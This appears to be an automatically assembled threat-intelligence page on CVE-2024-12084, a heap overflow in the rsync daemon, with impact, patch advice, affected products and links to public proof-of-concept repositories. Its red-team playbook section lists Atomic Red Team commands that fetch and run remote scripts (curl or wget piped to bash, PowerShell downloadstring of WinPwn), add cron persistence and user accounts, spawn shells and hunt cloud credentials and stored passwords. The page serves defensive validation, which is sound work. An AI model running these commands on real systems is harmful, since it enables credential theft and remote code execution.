CVE-2024-12084
Overview
This vulnerability is a heap-based buffer overflow caused by improper handling of attacker-controlled checksum length parameters within the rsync daemon's code. Specifically, the flaw arises when the defined MAX_DIGEST_LEN exceeds the fixed SUM_LENGTH of 16 bytes, leading to out-of-bounds writes in the sum2 buffer. The affected component is the checksum processing logic in the rsync daemon, which fails to validate or constrain the length of the s2length parameter properly.
Vulnerability Description
A heap-based buffer overflow flaw was found in the rsync daemon. This issue is due to improper handling of attacker-controlled checksum lengths (s2length) in the code. When MAX_DIGEST_LEN exceeds the fixed SUM_LENGTH (16 bytes), an attacker can write out of bounds in the sum2 buffer.
Impact
An unauthenticated remote attacker can exploit this vulnerability over the network to execute arbitrary code or cause a denial of service by crashing the rsync daemon. No user interaction or privileges are required, as the attack vector is network-based with low attack complexity and no authentication (AV:N/AC:L/PR:N/UI:N). Successful exploitation could lead to full compromise of the affected system or disruption of file synchronization services.
Solution
Red Hat has issued an advisory RHBA-2025:6470 addressing this vulnerability in affected rsync packages. Users should upgrade to patched versions of rsync provided in this advisory or later releases. Detailed patch instructions and updates are available at https://access.redhat.com/errata/RHBA-2025:6470. Other Linux distributions should apply their respective vendor patches or updates that incorporate the fix for checksum length validation in rsync.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the rsync daemon, specifically related to a heap-based buffer overflow. This flaw arises from improper handling of attacker-controlled checksum lengths, which can lead to out-of-bounds writes in the sum2 buffer when the maximum digest length exceeds the fixed sum length of 16 bytes. The exploitation of this vulnerability can result in significant memory corruption, potentially allowing an attacker to execute arbitrary code or crash the rsync service. The nature of this vulnerability underscores the importance of rigorous input validation and memory management practices in software development, particularly in network-facing applications.
Attack vectors for this vulnerability are primarily network-based, as the rsync daemon operates over TCP/IP, allowing remote attackers to send specially crafted requests that exploit the flaw. An attacker could craft a malicious payload that manipulates the checksum length, leading to the overflow condition. Once the attacker successfully triggers the overflow, they may gain control over the execution flow of the daemon, enabling them to execute arbitrary code with the privileges of the rsync process. This could lead to unauthorized access to sensitive data, service disruption, or even lateral movement within an organization's network, depending on the privileges assigned to the rsync daemon.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on rsync for data synchronization and backup operations. Given the high CVSS score of 9.8, the risk associated with this flaw is severe. Businesses may face data breaches, loss of integrity, and potential compliance violations if sensitive information is exposed or manipulated. Furthermore, the exploitation of this vulnerability could lead to significant downtime, resulting in financial losses and damage to reputation. Organizations that utilize affected versions of rsync, especially in critical infrastructure or sensitive environments, must prioritize addressing this vulnerability to mitigate the associated risks.
Detection and mitigation strategies for this vulnerability involve a multi-faceted approach. Organizations should implement network intrusion detection systems (NIDS) to monitor for anomalous traffic patterns indicative of exploitation attempts against the rsync daemon. Additionally, regular vulnerability assessments and penetration testing can help identify and remediate potential weaknesses in the system. The most effective mitigation strategy is to update to the latest patched version of rsync, as software vendors typically release updates to address known vulnerabilities. In conjunction with patch management, organizations should enforce strict access controls and limit the exposure of the rsync daemon to trusted networks, thereby reducing the attack surface.
In conclusion, the heap-based buffer overflow vulnerability in the rsync daemon represents a significant threat to organizations that utilize this software for data synchronization. The potential for remote exploitation, coupled with the severe impact on business operations and data integrity, necessitates immediate attention and action from affected organizations. By adopting a proactive approach to vulnerability management, including timely updates, robust detection mechanisms, and stringent access controls, organizations can effectively mitigate the risks associated with this vulnerability and safeguard their critical assets.
CSURFACE threat intelligence has detected a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-12084, rising by over 40% to place the vulnerability in the 0.90th percentile. This upward trend, accompanied by a near 13% increase over the past week, indicates growing attacker interest and a heightened likelihood of exploitation attempts. Concurrently, new proof-of-concept exploits have surfaced on public repositories, expanding the toolkit available to adversaries and lowering the barrier for exploitation. Although the rapidity of increase is moderate, the combination of elevated EPSS scores and accessible exploit code signals an evolving threat landscape that defenders must monitor closely. This development elevates the risk profile of the rsync daemon heap-based buffer overflow, underscoring an increased urgency for detection and response capabilities. Our telemetry suggests that while widespread exploitation has not yet surged dramatically, the conditions for opportunistic attacks are becoming more favorable, potentially leading to more frequent and sophisticated intrusion attempts targeting environments running vulnerable Samba Rsync versions.
Affected Products (10)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Samba | Rsync | 3.2.7 |
cpe:2.3:a:samba:rsync:3.2.7:-:*:*:*:*:*:*
|
|
|
Samba | Rsync | 3.3.0 |
cpe:2.3:a:samba:rsync:3.3.0:-:*:*:*:*:*:*
|
|
|
Almalinux | Almalinux | 10.0 |
cpe:2.3:o:almalinux:almalinux:10.0:-:*:*:*:*:*:*
|
|
|
Archlinux | Arch Linux | N/A |
cpe:2.3:o:archlinux:arch_linux:-:*:*:*:*:*:*:*
|
|
|
Gentoo | Linux | N/A |
cpe:2.3:o:gentoo:linux:-:*:*:*:*:*:*:*
|
|
|
Nixos | Nixos | All |
cpe:2.3:o:nixos:nixos:*:*:*:*:*:*:*:*
|
|
|
Nixos | Nixos | 24.11 |
cpe:2.3:o:nixos:nixos:24.11:*:*:*:*:*:*:*
|
|
|
Novell | Suse Linux | N/A |
cpe:2.3:o:novell:suse_linux:-:*:*:*:*:*:*:*
|
|
|
Tritondatacenter | Smartos | All |
cpe:2.3:o:tritondatacenter:smartos:*:*:*:*:*:*:*:*
|
|
|
Redhat | Enterprise Linux | 10.0 |
cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (3)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
themirze/cve-2024-12084
|
themirze | 4 | 3 | 2025-01-21 | View |
|
rxerium/CVE-2024-12084
A heap-based buffer overflow flaw was found in the rsync daemon. This issue is due to improper handling of attacker-cont...
|
rxerium | 1 | 0 | 2025-01-29 | View |
|
InkeyP/CVE-2024-12084
A easy poc for CVE-2024-12084.
|
InkeyP | 1 | 0 | 2025-11-24 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-12084 |
| access.redhat.com |
GitHub CVE
vendor-advisory
x_refsource_REDHAT
|
https://access.redhat.com/errata/RHBA-2025:6470 |
| access.redhat.com |
GitHub CVE
vdb-entry
x_refsource_REDHAT
|
https://access.redhat.com/security/cve/CVE-2024-12084 |
| bugzilla.redhat.com |
GitHub CVE
issue-tracking
x_refsource_REDHAT
|
https://bugzilla.redhat.com/show_bug.cgi?id=2330527 |
| kb.cert.org |
GitHub CVE
|
https://kb.cert.org/vuls/id/952657 |
| openwall.com |
NVD API
Mailing List
Third Party Advisory
|
http://www.openwall.com/lists/oss-security/2025/01/14/6 |
| security.netapp.com |
NVD API
|
https://security.netapp.com/advisory/ntap-20250131-0002/ |
| kb.cert.org |
NVD API
|
https://www.kb.cert.org/vuls/id/952657 |
| github.com |
NVD API
Exploit
Vendor Advisory
|
https://github.com/google/security-research/security/advisories/GHSA-p5pg-x43v-mvqj |